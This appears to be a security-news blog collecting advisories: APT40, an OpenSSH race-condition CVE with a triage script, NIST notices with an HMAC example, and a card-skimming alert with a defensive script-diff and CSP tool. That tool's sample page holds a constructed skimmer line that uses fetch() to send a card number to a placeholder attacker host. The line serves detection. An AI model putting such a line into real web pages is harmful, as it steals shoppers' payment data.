Build the skills you need to create new opportunities and accelerate your understanding of Microsoft Cloud technologies at a free Microsoft 365 Virtual Training Day from Microsoft Learn. Join us at Prepare Your Organization for Microsoft Copilot for Microsoft 365 to learn how to implement AI to help ignite creativity, enhance productivity, and strengthen computing and collaboration skills. You’ll learn about the capabilities of Copilot, including how it works, how to configure it, and how to set it up for more powerful searches. You’ll also explore how Copilot works with Microsoft Graph, and your existing Microsoft 365 apps, to provide intelligent, real-time assistance.
You will have the opportunity to:
- Understand the key components of Copilot for Microsoft 365 and how it works.
- Learn how to extend Copilot with plugins.
- Get guidance on completing the necessary Copilot technical and business requirements to prepare for implementation.
- Learn how to assign Copilot licenses, prepare your organization’s Microsoft 365 data for Copilot searches, and create a Copilot Center of Excellence.
Join us at an upcoming Prepare Your Organization for Microsoft Copilot for Microsoft 365 event:
Delivery Language: English
Closed Captioning Language(s): English
Visit the Microsoft Virtual Training Days website to learn more about other event opportunities.
Author: blogmirnet
PRC State-Sponsored Group, APT 40
The Cybersecurity and Infrastructure Security Agency (CISA) has collaborated with the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) to release an advisory outlining a People’s Republic of China (PRC) state-sponsored cyber threat group’s activity. The following organizations also collaborated with ASD’s ACSC on the guidance:
- The National Security Agency (NSA)
- The Federal Bureau of Investigation (FBI)
- The United Kingdom’s National Cyber Security Centre (NCSC-UK)
- The Canadian Centre for Cyber Security (CCCS)
- The New Zealand National Cyber Security Centre (NCSC-NZ)
- The German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV)
- The Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center (NCSC)
- Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Police Agency (NPA)
The advisory is based on current ACSC-led incident response investigations and shared understanding of a PRC state-sponsored cyber threat group, APT40, also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk in industry reporting.
APT40 has previously targeted organizations in various countries, including Australia and the United States. Notably, the group can quickly adapt public vulnerability proofs of concept (PoCs) for its own targeting, reconnaissance, and exploitation operations. It watches for newly disclosed vulnerabilities in widely used public software such as Log4j, Atlassian Confluence, and Microsoft Exchange and then targets infrastructure running the affected software.
CISA urges all organizations and software manufacturers to review the advisory to help identify, prevent, and remediate APT 40 intrusions. Software vendors are also urged to incorporate Secure by Design principles into their practices to limit the impact of threat actor techniques and to strengthen the security posture of their products for their customers. |
For more information on PRC state-sponsored threat actor activity, see CISA’s People’s Republic of China Cyber Threat. To learn more about secure by design principles and practices, visit CISA’s Secure by Design webpage. |
A Vulnerability in OpenSSH Could Allow for Remote Code Execution – PATCH: NOW
A vulnerability has been discovered in OpenSSH that could allow for remote code execution. OpenSSH is a suite of secure networking utilities based on the SSH protocol and is crucial for secure communication over unsecured networks. It is widely used in enterprise environments for remote server management, secure file transfers, and various DevOps practices. Successful exploitation of this vulnerability could allow for remote code execution in the context of the unprivileged user that runs sshd’s pre-authentication child process. An attacker could then run programs and view, change, or delete data with that user’s rights.
THREAT INTELLIGENCE:
There are no reports of this vulnerability being exploited in the wild.
SYSTEMS AFFECTED:
- OpenSSH versions 8.7 and 8.8 and corresponding portable versions
RISK:
Government:
- Large and medium government entities: High
- Small government entities: Medium
Businesses:
- Large and medium business entities: High
- Small business entities: Medium
Home users: Low
TECHNICAL SUMMARY:
A vulnerability has been discovered in OpenSSH, which could allow for remote code execution. Details of the vulnerability include:
Tactic: Initial Access (TA0001):
Technique: Exploit Public-Facing Application (T1190):
- CVE-2024-6409: A signal handler race condition in OpenSSH’s server (sshd). If a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), sshd’s SIGALRM handler runs asynchronously. That handler calls functions that are not async-signal-safe, for example syslog(), which leaves the cleanup_exit() path open to a signal handler race condition. In this CVE the race is in sshd’s unprivileged pre-authentication child process.
Successful exploitation of this vulnerability could allow for remote code execution in the context of that unprivileged user. An attacker could then run programs and view, change, or delete data with that user’s rights.
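The two checks a practitioner would script first for this advisory are the server version and the LoginGraceTime setting, since setting LoginGraceTime to 0 is the documented mitigation for this bug (it removes the SIGALRM timeout the race depends on, at the cost of letting unauthenticated sessions linger). The script below is an added example, not code from MS-ISAC, OpenSSH, or any distribution. Its version range is the 8.7 to 8.8 range the advisory lists, and its sample banner and sshd_config texts are constructed. One caveat it encodes: sshd keeps the first value it reads for a keyword, so a `LoginGraceTime 0` appended below an earlier setting does nothing; and a banner shows the upstream version, not the distribution’s patch level, so an in-range banner means "check the package changelog", not "exploitable".

```python
"""Triage checks for the CVE-2024-6409 advisory above.

Added example; not code from MS-ISAC, OpenSSH, or any distribution.
It (1) reads the OpenSSH version out of the server banner and compares
it with the 8.7-8.8 range the advisory lists, and (2) reads sshd_config
to see whether LoginGraceTime is 0, the documented mitigation.
"""
import re

AFFECTED_MIN, AFFECTED_MAX = (8, 7), (8, 8)      # inclusive, per the advisory
BANNER_RE = re.compile(r"^SSH-2\.0-OpenSSH_(\d+)\.(\d+)")


def parse_banner(banner: str):
    """Return (major, minor) from an sshd identification string, or None."""
    m = BANNER_RE.match(banner.strip())
    return (int(m.group(1)), int(m.group(2))) if m else None


def version_in_affected_range(banner: str) -> bool:
    v = parse_banner(banner)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX


def _seconds(value: str) -> int:
    """sshd time values: bare seconds or a number with an s/m/h suffix."""
    m = re.fullmatch(r"(\d+)([smh]?)", value.lower())
    if not m:
        raise ValueError(f"unparseable time value: {value!r}")
    return int(m.group(1)) * {"": 1, "s": 1, "m": 60, "h": 3600}[m.group(2)]


def login_grace_time(config_text: str, default: int = 120) -> int:
    """Effective LoginGraceTime, in seconds.

    sshd keeps the FIRST value it reads for a keyword; keywords are
    case-insensitive; only whole lines starting with '#' are comments;
    everything after a 'Match' line belongs to that block, and
    LoginGraceTime is not valid inside a Match block.
    """
    in_match = False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *rest = re.split(r"[\s=]+", line, maxsplit=1)
        key = key.lower()
        if key == "match":
            in_match = True
            continue
        if in_match or key != "logingracetime" or not rest:
            continue
        return _seconds(rest[0].strip().strip('"'))
    return default


def assess(banner: str, config_text: str) -> dict:
    grace = login_grace_time(config_text)
    in_range = version_in_affected_range(banner)
    return {
        "version": parse_banner(banner),
        "in_affected_range": in_range,
        "login_grace_time": grace,
        "mitigated_by_config": grace == 0,
        "needs_attention": in_range and grace != 0,
    }


# Constructed sample inputs (not captured from a real host).
SAMPLE_BANNER = "SSH-2.0-OpenSSH_8.7"
SAMPLE_CONFIG_APPENDED = """\
Port 22
LoginGraceTime 2m
# Added later by an admin who believed this would mitigate the bug.
# sshd already took "2m" above, so the effective value is still 120 s.
LoginGraceTime 0
Match User backup
    PasswordAuthentication no
"""
SAMPLE_CONFIG_MITIGATED = """\
LoginGraceTime 0
Port 22
"""

if __name__ == "__main__":
    for name, cfg in (("appended", SAMPLE_CONFIG_APPENDED),
                      ("mitigated", SAMPLE_CONFIG_MITIGATED)):
        print(name, assess(SAMPLE_BANNER, cfg))
```

On a real host, feed `login_grace_time()` the contents of /etc/ssh/sshd_config (and any files it includes) and `parse_banner()` the first line returned by connecting to port 22; `sshd -T` prints the effective configuration if you would rather not parse the file yourself.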
RECOMMENDATIONS:
We recommend the following actions be taken:
- Apply appropriate mitigations provided by OpenSSH or the affected Linux vendor to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
- Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
- Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
- Safeguard 7.6: Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets: Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.
- Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
- Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)
- Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
- Safeguard 5.4: Restrict Administrator Privileges to Dedicated Administrator Accounts: Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.
- Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. (M1035: Limit Access to Resource Over Network)
- Use intrusion detection signatures to block traffic at network boundaries. (M1031: Network Intrusion Prevention)
- Safeguard 13.3: Deploy a Network Intrusion Detection Solution: Deploy a network intrusion detection solution on enterprise assets, where appropriate. Example implementations include the use of a Network Intrusion Detection System (NIDS) or equivalent cloud service provider (CSP) service.
- Safeguard 13.8: Deploy a Network Intrusion Prevention Solution: Deploy a network intrusion prevention solution, where appropriate. Example implementations include the use of a Network Intrusion Prevention System (NIPS) or equivalent CSP service.
- Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. (M1050: Exploit Protection)
- Safeguard 13.10: Perform Application Layer Filtering: Perform application layer filtering. Example implementations include a filtering proxy, application layer firewall, or gateway.
REFERENCES:
OpenSSH:
http://www.openwall.com/lists/oss-security/2024/07/08/2
Oligo Security (covers the related CVE-2024-6387, regreSSHion):
https://www.oligo.security/blog/critical-openssh-vulnerability-cve-2024-6387-regresshion
RedHat:
https://access.redhat.com/security/cve/CVE-2024-6409
Ubuntu:
https://ubuntu.com/security/CVE-2024-6409
CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6409
Still Time to Register! NCCoE Trusted IoT Onboarding Webinar
Date/Time: Wednesday, July 10, 2024 | 10:00–11:30 AM ET
Description
Join the NIST NCCoE for a webinar to discuss guidance and considerations for trusted IoT onboarding to help organizations safeguard both their IoT devices and their networks.
The NCCoE, in collaboration with 11 product and service providers, has produced five builds demonstrating network-layer onboarding and two builds demonstrating the factory provisioning process. The configurations offer secure ways to provision devices to a network using their network credentials.
Recently, we released the final draft publication of NIST Special Publication 1800-36, Trusted IoT Device Network-Layer Onboarding and Lifecycle Management, which includes updates to several of the builds. The public comment period for the publication is open until July 30, 2024.
During this webinar, attendees will:
- Meet the NCCoE IoT Onboarding team and their industry collaborators
- Learn about the latest updates to Draft NIST SP 1800-36, Trusted IoT Device Network-Layer Onboarding and Lifecycle Management, and how it can be used to help organizations protect both their IoT devices and their networks
- Hear from the project’s collaborators about example technology solutions using Wi-Fi Easy Connect, BRSKI, and Thread
- Engage in a Q&A period with the project team and industry experts
- Gain resources and additional information for implementation
Speakers
- Tim McBride, Deputy Director, NIST NCCoE
- Paul Watrobski, Principal Investigator, NIST NCCoE
- Brecht Wyseur, Senior Product Manager and Product Strategy, Kudelski IoT
- Nick Allott, CEO, NquiringMinds
- Steve Clark, Security Technologist, WISeKey
- Dan Harkins, Fellow, HPE Aruba
- Andy Dolan, Senior Security Engineer, CableLabs
- Craig Pratt, Lead Software Engineer, CableLabs
- Darshak Thakore, Principal Architect, CableLabs
Contact Us
If you have any questions about this event, please reach out to the team at iot-onboarding@nist.gov.
To receive the latest project news and updates, consider joining the NCCoE IoT Onboarding Community of Interest (COI). You can sign up by completing the COI form or by emailing the team declaring your interest.
Save the Date! Safeguarding Health Information: Building Assurance Through HIPAA Security Conference (Oct 23-24, 2024)
The U.S. Department of Health and Human Services Office for Civil Rights (OCR) and the National Institute of Standards and Technology (NIST) are excited to announce the return of the “Safeguarding Health Information: Building Assurance through HIPAA Security” conference for October 2024. After a 5-year absence, the conference is returning to Washington, D.C.
DATES: October 23–24, 2024
LOCATION: HHS Headquarters (Hubert H. Humphrey Building) in Washington, D.C.
CONTENT: The conference will explore the current healthcare cybersecurity landscape and the Health Insurance Portability and Accountability Act (HIPAA) Security Rule. This event will highlight the present state of healthcare cybersecurity, and practical strategies, tips and techniques for implementing the HIPAA Security Rule. The Security Rule sets federal standards to protect the confidentiality, integrity and availability of electronic protected health information by requiring HIPAA covered entities and their business associates to implement and maintain administrative, physical and technical safeguards.
The conference will offer sessions that explore best practices in managing risks to and the technical assurance of electronic health information. Presentations will cover a variety of topics including managing cybersecurity risk and implementing practical cybersecurity solutions, understanding current cybersecurity threats to the healthcare community, cybersecurity considerations for the Internet of Things (IoT) in healthcare environments, updates from federal healthcare agencies, and more.
Registration will open later in the summer.
Please contact ocrpresents@hhs.gov with questions or if you have recommendations for topics to include in the agenda. Hope to see you there!
Keyed-Hash Message Authentication Code (HMAC) | Draft SP 800-224 is Available for Public Comment
The initial public draft (ipd) of NIST Special Publication (SP) 800-224, Keyed-Hash Message Authentication Code (HMAC): Specification of HMAC and Recommendations for Message Authentication, is now available for public comment.
This publication includes the HMAC specification from Federal Information Processing Standard (FIPS) 198-1, The Keyed-Hash Message Authentication Code (HMAC) (2008) and incorporates some requirements from SP 800-107r1 (Revision 1), Recommendation for Applications Using Approved Hash Algorithms (2012). This development was proposed by the NIST Crypto Publication Review Board based on the reviews of FIPS 198-1 and SP 800-107r1 in 2022. The final version of SP 800-224 is expected to be published concurrently with the withdrawal of FIPS 198-1.
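Because SP 800-224 carries the FIPS 198-1 construction forward unchanged, it is worth seeing that construction written out step by step. The block below is an added example, not code from NIST or from the draft; it follows the FIPS 198-1 steps literally (bring the key to exactly B bytes, XOR with ipad and opad, hash twice) and cross-checks the result against Python’s hmac module and a published RFC 4231 test vector. Names such as `hmac_fips198` and `verify_tag` are this example’s own.

```python
"""HMAC computed step by step as FIPS 198-1 specifies it.

Added example, not code from NIST or from SP 800-224.  Notation: H is an
approved hash function, B its input block size in bytes, ipad/opad the
bytes 0x36/0x5c repeated B times, K0 the key brought to B bytes.
"""
import hashlib
import hmac as stdlib_hmac


def hmac_fips198(key: bytes, text: bytes, hash_name: str = "sha256") -> bytes:
    B = hashlib.new(hash_name).block_size        # 64 for SHA-256, 128 for SHA-512
    # Steps 1-3: K0 is exactly B bytes: hash the key if it is longer than B,
    # then right-pad with zeros.  (A key shorter than B is only padded.)
    if len(key) > B:
        key = hashlib.new(hash_name, key).digest()
    k0 = key.ljust(B, b"\x00")
    # Steps 4-9: H((K0 xor opad) || H((K0 xor ipad) || text))
    k0_ipad = bytes(b ^ 0x36 for b in k0)
    k0_opad = bytes(b ^ 0x5C for b in k0)
    inner = hashlib.new(hash_name, k0_ipad + text).digest()
    return hashlib.new(hash_name, k0_opad + inner).digest()


def verify_tag(key: bytes, text: bytes, tag: bytes, hash_name: str = "sha256") -> bool:
    """Verify a received tag.  compare_digest avoids leaking where the
    comparison first differs (a timing side channel) when rejecting."""
    return stdlib_hmac.compare_digest(hmac_fips198(key, text, hash_name), tag)


def matches_stdlib(key: bytes, text: bytes, hash_name: str) -> bool:
    """Cross-check against the standard library for the same inputs."""
    return hmac_fips198(key, text, hash_name) == stdlib_hmac.new(key, text, hash_name).digest()


# RFC 4231 test case 1 (HMAC-SHA-256), a published vector usable as a KAT.
RFC4231_KEY = b"\x0b" * 20
RFC4231_TEXT = b"Hi There"
RFC4231_SHA256 = bytes.fromhex(
    "b0344c61d8db38535ca8afceaf0bf12b881dc200c9833da726e9376c2e32cff7")

if __name__ == "__main__":
    print(hmac_fips198(RFC4231_KEY, RFC4231_TEXT).hex())
    # A key longer than B exercises the "hash the key first" step.
    print(matches_stdlib(b"k" * 200, b"msg", "sha512"))
```

The verification path matters as much as the computation: a tag should be checked with a constant-time comparison, and the key, not the message, is what must stay secret.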
The public comment period is open through September 6, 2024. See the publication details for a copy of the draft; comments can be submitted to SP800-224-comments@list.nist.gov. Comments received in response to this request will be posted on the NIST website after the due date.
CISA is updating the National Cyber Incident Response Plan, listening session June 27
The Cybersecurity and Infrastructure Security Agency (CISA) is updating the National Cyber Incident Response Plan (NCIRP) 2024, the primary strategic framework for coordinating the response to significant cyber incidents across the federal government and its partners.
In the spirit of whole of community response and collaborative cyber defense, CISA is inviting stakeholders from across public and private sectors, academia, and individual researchers, and experts in cybersecurity and response, to attend a series of three virtual NCIRP 2024 listening sessions.
The intent of these sessions is to hear feedback about the existing NCIRP and any experience with incident response coordination with the federal government more broadly. A draft of the NCIRP 2024 is being prepared and will be posted to CISA’s NCIRP webpage for public comment this summer. Perspectives gathered during the listening sessions will inform the update which will be published at the end of calendar year 2024.
CISA is releasing a newsletter series, New and Noteworthy, to support the NCIRP 2024 update. Each newsletter will keep the public informed on planning processes, plan development, and stakeholder engagement efforts in support of the NCIRP 2024.
The first listening session was held on May 8, 2024. During this session, CISA addressed the following topics:
- Overview of the NCIRP and the process for updating the 2024 Plan.
- The role of Information Sharing and Analysis Centers (ISACs).
- The integration of state, local, tribal, and territorial (SLTT) entities into cyber incident response.
- The role of state fusion centers in the information sharing process.
- Cyber incident reporting, specifically, how to define who an “asset owner” is and who should be contacted during a significant cyber incident.
CISA has just announced its second listening session, which will be held on Thursday, June 27, 2024, from 1-2 p.m. EDT. See CISA’s second issue of New and Noteworthy to learn more and register.
For more information on the NCIRP, visit CISA’s NCIRP page.
Concept Paper Release and More Updates for the Privacy Framework 1.1 + Data Governance and Management Profile Workshop!
We have released concept papers for the NIST Privacy Framework (PF) Version 1.1 update as well as the Data Governance and Management (DGM) Profile. These concept papers will support discussion sessions at next week’s hybrid workshop. We encourage you to familiarize yourself with the material prior to participating in the workshop. If you would like to provide informal feedback on this material in addition to or in lieu of participating in the workshop, please send it to privacyframework@nist.gov by July 31, 2024.
We have extended the deadline for in-person registration to 11:59 PM EDT today, Thursday, June 20. Please be aware that breakout sessions are filling up quickly for in-person participants, so please register as soon as possible, if you have not already. Registration is free and required for this event.
Event registration, agenda, speakers, and other workshop information is available here.
If you have any questions, please email us at privacyframework@nist.gov.
We look forward to seeing you next week!
Best,
NIST Privacy Framework Team
CISA Releases Guidance on Single Sign-On (SSO) Adoption for Small and Medium-Sized Businesses (SMBs)
Today, CISA released Barriers to Single Sign-On (SSO) Adoption for Small and Medium-Sized Businesses: Identifying Challenges and Opportunities, a detailed report exploring challenges to SSO adoption by small and medium-sized businesses (SMBs). The report also identifies potential ways to overcome these challenges and improve an SMB’s level of security.
CISA also released a related blog post, Why SMBs Don’t Deploy Single Sign-On (SSO), urging software manufacturers to consider how their business practices may inadvertently reduce the security posture of their customers.
For more information, visit CISA’s Secure by Design webpage. To learn more about identity and access management, visit Identity, Credential, and Access Management (ICAM).
Card Skimming Scams
Post Date: 06/20/2024
Image adapted from: FICO
Summary
Reported card skimming incidents increased by 40 percent from 2022 to 2023. More specifically, New Jersey is one of the top five states, accounting for nearly 50 percent of card compromise reports (CCRs). The outlook for 2024 shows an upward trend, which means increased card skimming opportunities for threat actors to capture and steal customer data and financial information through various physical and digital realms. Threat actors seek methods to conceal their attacks better and evade multiple security measures. This stolen data has severe consequences for consumers and businesses, including loss in revenue, legal damages, compliance issues, cross-site contamination, compromised personally identifiable information (PII), identity theft, fraud, and subsequent malicious activity.
Physical skimming devices are typically located at ATMs and point of sale (POS) systems, such as convenience stores, grocery stores, retail stores, gas stations, and restaurants. In addition to skimmers, hidden cameras and fake numerical keypads can capture and record keystrokes of PINs or passwords. Once the card is swiped, the skimming device stores the victim’s information, which the threat actors can physically retrieve later. However, the increasing use of cellular and Bluetooth technologies enables threat actors to retrieve victims’ data remotely and quickly, with a low likelihood of detection.
Since the onset of 2024, physical skimmers have been identified and reported to law enforcement in New Jersey, including ATMs at Capital One Bank and Proponent Bank in Nutley, 2 ATMs at Wawa in Galloway Township, and card readers at Dollar Tree and Walmart in Bayonne and 7-Eleven in Cinnaminson and Pennsauken. Additionally, a skimmer was detected at Supremo Food Market in Pennsauken, and the latest reports of skimming devices were identified at Aldi Stores in Roselle and Union.
Furthermore, law enforcement charged a Lakehurst gas station employee with stealing customers’ information from their card purchases and making fraudulent purchases. Two men were also arrested for placing skimming devices on several Westfield ATMs to steal debit card information and use counterfeit debit cards in fraudulent cash withdrawals.
The online equivalent of physical skimming is digital or web skimming, which targets the checkout pages of retailers, restaurants, financial institutions, and any online business that takes payments through a POS or payment provider. Magecart attacks are a type of web-based data skimming operation that captures customer payment card data from the checkout pages of online stores. These attacks are accomplished by gaining access to the targeted website (either directly or through a supply chain attack), injecting malicious code into the checkout page to skim the desired data, and sending the information back to a threat actor-controlled server. Once threat actors steal the payment card information, they can use it to make fraudulent purchases or sell it on the dark web or other marketplaces.
In February, researchers discovered threat actors exploiting a critical vulnerability, CVE-2024-20720, without user interaction. Threat actors inserted malicious XML code in the “layout_update” database table on Magento servers to create a persistent backdoor to the CMS controller and automatically inject malware and additional malicious payloads, including a fake Stripe payment skimmer designed to steal information from unsuspecting online shoppers.
In April, researchers found a card skimmer embedded in a fake Facebook Pixel tracker script, a script type normally used to track advertisement-driven visitor activity on websites. Threat actors injected the script into compromised websites through plugins that allow custom code; the script watches for the checkout page and, when a victim reaches it, presents a fraudulent overlay that captures the card information.
In May, threat actors used the Dessky Snippets WordPress plugin, a plugin for adding custom PHP that many websites use, to place malicious PHP on websites they had compromised. The injected code altered the WooCommerce checkout process by manipulating the billing form and adding new fields to steal financial information. To add a sense of legitimacy and reduce suspicion, the threat actors turned off the autocomplete feature on the billing form so that web browsers would not suggest previously entered sensitive information, making the added fields look like standard inputs required to complete the transaction.
Recommendations for Consumers
- When possible, use credit cards over debit cards for purchases, as credit cards often have greater consumer protections that limit a victim’s liability if fraudulent purchases are made.
- Enable payment charge notifications for every transaction on an account to be alerted of a fraudulent transaction as soon as it occurs.
- Before you use a POS system or ATM, check to see if there are signs of tampering.
- Use tap to pay or pay with your phone, as contactless or chip payment options are safer than swiping the card’s magnetic stripe.
- Navigate directly to known, secure, and encrypted websites and designate or monitor one credit card for purchases, if possible.
- Enable multi-factor authentication (MFA) on every account that offers it, including any online shopping websites.
- Update browsers and use ad blockers.
Recommendations for Website Administrators
- Ensure hardware and software are up to date.
- Use strong, unique passwords for all accounts (admin, SFTP, database) and enable multi-factor authentication (MFA) on all administrative accounts at a minimum.
- Use only vetted first-party code.
- Use a web application firewall (WAF) to block and alert for potential code injection attacks.
- Block unauthorized transmission of personal data by implementing a Content Security Policy (CSP).
- Schedule routine website scans to identify changes in code composition.
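Two of the recommendations above, the routine scan for changes in code composition and the Content Security Policy, can be built from the same inventory of a page’s scripts: a Magecart-style injection shows up as a new script origin or a new inline script, and the origins in a known-good copy of the page are exactly what the CSP should allow. The block below is an added example, not tooling from the NJCCIC post or from any vendor. Its HTML pages are constructed, the payment-provider host `js.payments.example` and the attacker host `cdn.analytics-pixel.invalid` are placeholders, and a real checkout page will need further directives (for instance frame-src for a hosted payment iframe) beyond the allowlist shown.

```python
"""Script inventory diff plus a derived CSP for a checkout page.

Added example for the administrator recommendations above; not tooling
from the NJCCIC post or any vendor.  Records every <script> on a
known-good page (external sources by origin, inline scripts by SHA-256),
diffs a later copy against that baseline, and derives a CSP from the
approved origins.  All HTML and hostnames here are constructed.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptCollector(HTMLParser):
    """Collects <script src> origins and SHA-256 hashes of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = {}            # sha256 hex -> first 60 chars, for reporting
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            parts = urlsplit(src)
            # "//host/x" (scheme-relative) and "/x" (same origin) both occur
            self.external.add(f"{parts.scheme or 'https'}://{parts.netloc}"
                              if parts.netloc else "'self'")
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            body = "".join(self._buf).strip()
            self.inline[hashlib.sha256(body.encode()).hexdigest()] = body[:60]
            self._in_inline = False


def inventory(html: str) -> dict:
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return {"external": p.external, "inline": p.inline}


def scan(baseline_html: str, current_html: str) -> dict:
    """Everything in the current page that the baseline did not have."""
    base, cur = inventory(baseline_html), inventory(current_html)
    return {
        "new_origins": cur["external"] - base["external"],
        "new_inline": {h: s for h, s in cur["inline"].items() if h not in base["inline"]},
    }


def csp_header(approved_origins) -> str:
    """CSP value that confines both script loading and exfiltration paths.

    script-src: what may execute; connect-src: fetch/XHR/beacon targets;
    img-src 'self': blocks the "new Image().src = attacker?data" trick;
    form-action 'self': blocks re-pointing the checkout form elsewhere.
    """
    hosts = sorted(o for o in approved_origins if o != "'self'")
    listed = " ".join(["'self'", *hosts])
    return (f"default-src 'self'; script-src {listed}; connect-src {listed}; "
            "img-src 'self'; form-action 'self'; frame-ancestors 'none'")


# Constructed sample pages (not from any real site).
BASELINE_HTML = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://js.payments.example/v3/"></script>
<script>window.shop = {currency: "USD"};</script>
</head><body><form action="/checkout"><input id="cc"></form></body></html>"""

# The same page after a skimmer injection: a fake "pixel" from an attacker
# host plus an inline hook that exfiltrates the card number on blur.
INJECTED_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script src="//cdn.analytics-pixel.invalid/fbpixel.js"></script>\n'
    "<script>document.querySelector('#cc').addEventListener('blur', e =>"
    " fetch('https://cdn.analytics-pixel.invalid/c?d=' + btoa(e.target.value)));</script>\n"
    "</head>")

if __name__ == "__main__":
    print(scan(BASELINE_HTML, INJECTED_HTML))
    print("Content-Security-Policy:", csp_header(inventory(BASELINE_HTML)["external"]))
```

Run `scan()` on a scheduled fetch of the live checkout page against the stored baseline and alert on any non-empty result; regenerate the baseline only after a reviewed deployment, since a skimmer that is baselined becomes invisible to this check.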
Resources